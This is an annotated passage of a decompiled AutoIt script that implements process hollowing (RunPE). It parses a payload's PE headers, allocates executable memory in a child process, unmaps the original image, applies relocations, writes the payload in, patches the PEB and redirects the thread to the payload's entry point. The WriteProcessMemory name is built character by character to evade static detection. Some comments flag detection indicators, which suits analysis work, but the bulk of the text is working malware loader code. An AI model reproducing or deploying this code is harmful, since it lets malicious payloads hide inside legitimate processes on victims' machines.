- ; Optional header magic: 267 = 0x10B (PE32), 523 = 0x20B (PE32+). Bitness must match the
- ; loader's, otherwise @ERROR 6.
- LOCAL $29=DLLSTRUCTCREATE("word Magic;",$1T)
- LOCAL $2A=DLLSTRUCTGETDATA($29,1)
- LOCAL $2B
- IF $2A=267 THEN
- IF $1Q THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(6,0,0)
- ENDIF
- $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"dword BaseOfData;"&"dword ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"dword SizeOfStackReserve;"&"dword SizeOfStackCommit;"&"dword SizeOfHeapReserve;"&"dword SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
- $1T+=96
- ELSEIF $2A=523 THEN
- IF NOT $1Q THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(6,0,0)
- ENDIF
- $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"uint64 ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"uint64 SizeOfStackReserve;"&"uint64 SizeOfStackCommit;"&"uint64 SizeOfHeapReserve;"&"uint64 SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
- $1T+=112
- ELSE
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(6,0,0)
- ENDIF
- LOCAL $2C=DLLSTRUCTGETDATA($2B,"AddressOfEntryPoint")
- LOCAL $2D=DLLSTRUCTGETDATA($2B,"SizeOfHeaders")
- LOCAL $2E=DLLSTRUCTGETDATA($2B,"ImageBase")
- LOCAL $2F=DLLSTRUCTGETDATA($2B,"SizeOfImage")
- ; Skip data directories 0-4 (8 bytes each) to reach entry 5, the base-relocation table.
- $1T+=8
- $1T+=8
- $1T+=24
- LOCAL $2G=DLLSTRUCTCREATE("dword VirtualAddress; dword Size",$1T)
- LOCAL $2H=DLLSTRUCTGETDATA($2G,"VirtualAddress")
- LOCAL $2I=DLLSTRUCTGETDATA($2G,"Size")
- LOCAL $2J
- IF $2H AND $2I THEN $2J=TRUE
- IF NOT $2J THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!"&@CRLF)
- $1T+=88
- ; Step 4: obtain RWX memory in the child for the whole image. Relocatable payloads may land
- ; anywhere ($2K=TRUE → fixups applied later); otherwise the original ImageBase is required,
- ; and the host's own image is unmapped (NtUnmapViewOfSection) to free that range.
- LOCAL $2K
- LOCAL $2L
- IF $2J THEN
- $2L=_6K($1X,$2F)
- IF @ERROR THEN
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- _6L($1X,$2E)
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(101,1,0)
- ENDIF
- ENDIF
- ENDIF
- $2K=TRUE
- ELSE
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- _6L($1X,$2E)
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(101,0,0)
- ENDIF
- ENDIF
- ENDIF
- DLLSTRUCTSETDATA($2B,"ImageBase",$2L)
- ; Step 5: build a local copy of the mapped image (headers + each section at its VA).
- LOCAL $2M=DLLSTRUCTCREATE("byte["&$2F&"]")
- LOCAL $2N=DLLSTRUCTGETPTR($2M)
- LOCAL $2O=DLLSTRUCTCREATE("byte["&$2D&"]",$24)
- DLLSTRUCTSETDATA($2M,1,DLLSTRUCTGETDATA($2O,1))
- LOCAL $2P
- LOCAL $2Q,$2R
- LOCAL $2S,$2T
- LOCAL $2U
- FOR $2V=1 TO $28
- $2P=DLLSTRUCTCREATE("char Name[8];"&"dword UnionOfVirtualSizeAndPhysicalAddress;"&"dword VirtualAddress;"&"dword SizeOfRawData;"&"dword PointerToRawData;"&"dword PointerToRelocations;"&"dword PointerToLinenumbers;"&"word NumberOfRelocations;"&"word NumberOfLinenumbers;"&"dword Characteristics",$1T)
- $2Q=DLLSTRUCTGETDATA($2P,"SizeOfRawData")
- $2R=$24+DLLSTRUCTGETDATA($2P,"PointerToRawData")
- $2S=DLLSTRUCTGETDATA($2P,"VirtualAddress")
- $2T=DLLSTRUCTGETDATA($2P,"UnionOfVirtualSizeAndPhysicalAddress")
- IF $2T AND $2T<$2Q THEN $2Q=$2T
- IF $2Q THEN
- DLLSTRUCTSETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2N+$2S),1,DLLSTRUCTGETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2R),1))
- ENDIF
- ; Remember where the relocation table lives in the raw file for _6I.
- IF $2K THEN
- IF $2S<=$2H AND $2S+$2Q>$2H THEN
- $2U=DLLSTRUCTCREATE("byte["&$2I&"]",$2R+($2H-$2S))
- ENDIF
- ENDIF
- $1T+=40
- NEXT
- IF $2K THEN _6I($2N,$2U,$2L,$2E,$2A=523)
- ; Step 6: write the image into the child (API name resolved at runtime by _6H).
- $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$2L,"ptr",$2N,"dword_ptr",$2F,"dword_ptr*",0)
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(7,0,0)
- ENDIF
- ; Step 7: read the child's PEB, overwrite ImageBaseAddress with the new base, write it back.
- ; The PEB layout below is a hand-written approximation; only the leading fields matter here.
- LOCAL $2W=DLLSTRUCTCREATE("byte InheritedAddressSpace;"&"byte ReadImageFileExecOptions;"&"byte BeingDebugged;"&"byte Spare;"&"ptr Mutant;"&"ptr ImageBaseAddress;"&"ptr LoaderData;"&"ptr ProcessParameters;"&"ptr SubSystemData;"&"ptr ProcessHeap;"&"ptr FastPebLock;"&"ptr FastPebLockRoutine;"&"ptr FastPebUnlockRoutine;"&"dword EnvironmentUpdateCount;"&"ptr KernelCallbackTable;"&"ptr EventLogSection;"&"ptr EventLog;"&"ptr FreeList;"&"dword TlsExpansionCounter;"&"ptr TlsBitmap;"&"dword TlsBitmapBits[2];"&"ptr ReadOnlySharedMemoryBase;"&"ptr ReadOnlySharedMemoryHeap;"&"ptr ReadOnlyStaticServerData;"&"ptr AnsiCodePageData;"&"ptr OemCodePageData;"&"ptr UnicodeCaseTableData;"&"dword NumberOfProcessors;"&"dword NtGlobalFlag;"&"byte Spare2[4];"&"int64 CriticalSectionTimeout;"&"dword HeapSegmentReserve;"&"dword HeapSegmentCommit;"&"dword HeapDeCommitTotalFreeThreshold;"&"dword HeapDeCommitFreeBlockThreshold;"&"dword NumberOfHeaps;"&"dword MaximumNumberOfHeaps;"&"ptr ProcessHeaps;"&"ptr GdiSharedHandleTable;"&"ptr ProcessStarterHelper;"&"ptr GdiDCAttributeList;"&"ptr LoaderLock;"&"dword OSMajorVersion;"&"dword OSMinorVersion;"&"dword OSBuildNumber;"&"dword OSPlatformId;"&"dword ImageSubSystem;"&"dword ImageSubSystemMajorVersion;"&"dword ImageSubSystemMinorVersion;"&"dword GdiHandleBuffer[34];"&"dword PostProcessInitRoutine;"&"dword TlsExpansionBitmap;"&"byte TlsExpansionBitmapBits[128];"&"dword SessionId")
- $1W=DLLCALL("kernel32.dll","bool","ReadProcessMemory","ptr",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(8,0,0)
- ENDIF
- DLLSTRUCTSETDATA($2W,"ImageBaseAddress",$2L)
- $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(9,0,0)
- ENDIF
- ; Step 8: point the initial-thread entry register (Eax / Rcx) at the payload entry point,
- ; apply the context and resume. Handles are closed; the child keeps running detached.
- SWITCH $1Z
- CASE 1
- DLLSTRUCTSETDATA($20,"Eax",$2L+$2C)
- CASE 2
- DLLSTRUCTSETDATA($20,"Rcx",$2L+$2C)
- CASE 3
- ENDSWITCH
- $1W=DLLCALL("kernel32.dll","bool","SetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(10,0,0)
- ENDIF
- $1W=DLLCALL("kernel32.dll","dword","ResumeThread","handle",$1Y)
- IF @ERROR OR $1W[0]=-1 THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(11,0,0)
- ENDIF
- DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1X)
- DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1Y)
- RETURN DLLSTRUCTGETDATA($1V,"ProcessId")
- ENDFUNC
- ; _6H(): returns the string "WriteProcessMemory", assembled one character at a time so the
- ; API name does not appear as a contiguous string in the compiled script (static-detection
- ; evasion). Dynamic API-call monitoring is unaffected by this.
- FUNC _6H()
- LOCAL $2X[18]=["W","r","i","t","e","P","r","o","c","e","s","s","M","e","m","o","r","y"],$2Y
- FOR $2Z IN $2X
- $2Y&=$2Z
- NEXT
- RETURN $2Y
- ENDFUNC
- ; _6I($localImage, $relocTable, $newBase, $origBase, $is64): apply PE base relocations to
- ; the locally built image before it is written into the child.
- ; Walks each IMAGE_BASE_RELOCATION block (VirtualAddress, SizeOfBlock, then 16-bit entries);
- ; entries whose type (upper 4 bits) equals 3 (HIGHLOW) for 32-bit or 10 (DIR64) for 64-bit
- ; ($12 = 3 + 7*$is64) get the delta $newBase - $origBase added at page + (entry & 0xFFF).
- ; Always returns 1. $38 starts undefined and is treated as 0 by the first comparison.
- FUNC _6I($2N,$30,$31,$32,$33)
- LOCAL $34=$31-$32
- LOCAL $35=DLLSTRUCTGETSIZE($30)
- LOCAL $36=DLLSTRUCTGETPTR($30)
- LOCAL $37,$38
- LOCAL $2S,$39,$3A
- LOCAL $3B,$3C,$3D
- LOCAL $12=3+7*$33
- WHILE $38<$35
- $37=DLLSTRUCTCREATE("dword VirtualAddress; dword SizeOfBlock",$36+$38)
- $2S=DLLSTRUCTGETDATA($37,"VirtualAddress")
- $39=DLLSTRUCTGETDATA($37,"SizeOfBlock")
- $3A=($39-8)/2
- $3B=DLLSTRUCTCREATE("word["&$3A&"]",DLLSTRUCTGETPTR($37)+8)
- FOR $2V=1 TO $3A
- $3C=DLLSTRUCTGETDATA($3B,1,$2V)
- IF BITSHIFT($3C,12)=$12 THEN
- $3D=DLLSTRUCTCREATE("ptr",$2N+$2S+BITAND($3C,4095))
- DLLSTRUCTSETDATA($3D,1,DLLSTRUCTGETDATA($3D,1)+$34)
- ENDIF
- NEXT
- $38+=$39
- WEND
- RETURN 1
- ENDFUNC
- ; _6J($hProcess, $base, $size): VirtualAllocEx at a fixed address in the child.
- ; Tries 4096 (MEM_COMMIT) then 12288 (MEM_COMMIT|MEM_RESERVE); protection 64 =
- ; PAGE_EXECUTE_READWRITE. Returns the address, or 0 with @ERROR 1 when both attempts fail.
- ; Remote RWX allocations of this kind are a common EDR detection point.
- FUNC _6J($1X,$3E,$35)
- LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",4096,"dword",64)
- IF @ERROR OR NOT $1W[0]THEN
- $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",12288,"dword",64)
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- ENDIF
- RETURN $1W[0]
- ENDFUNC
- ; _6K($hProcess, $size): VirtualAllocEx at any address (lpAddress = 0), MEM_COMMIT|MEM_RESERVE,
- ; PAGE_EXECUTE_READWRITE. Returns the address, or 0 with @ERROR 1 on failure.
- FUNC _6K($1X,$35)
- LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",0,"dword_ptr",$35,"dword",12288,"dword",64)
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- RETURN $1W[0]
- ENDFUNC
- ; _6L($hProcess, $base): NtUnmapViewOfSection on the child's original image so its address
- ; range can be re-allocated. Only the DllCall error is checked; the NTSTATUS result is
- ; ignored. Direct ntdll unmapping from a user-mode script is itself a hollowing indicator.
- FUNC _6L($1X,$3E)
- DLLCALL("ntdll.dll","int","NtUnmapViewOfSection","ptr",$1X,"ptr",$3E)
- IF @ERROR THEN RETURN SETERROR(1,0,0)
- RETURN 1
- ENDFUNC
- ; _6M($hProcess): IsWow64Process wrapper. Returns the Wow64Process out-parameter (non-zero
- ; when the child is a 32-bit process on 64-bit Windows), or 0 with @ERROR 1 on failure.
- FUNC _6M($1X)
- LOCAL $1W=DLLCALL("kernel32.dll","bool","IsWow64Process","handle",$1X,"bool*",0)
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- RETURN $1W[2]
- ENDFUNC
- ; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< - dmod 2.12 build(269)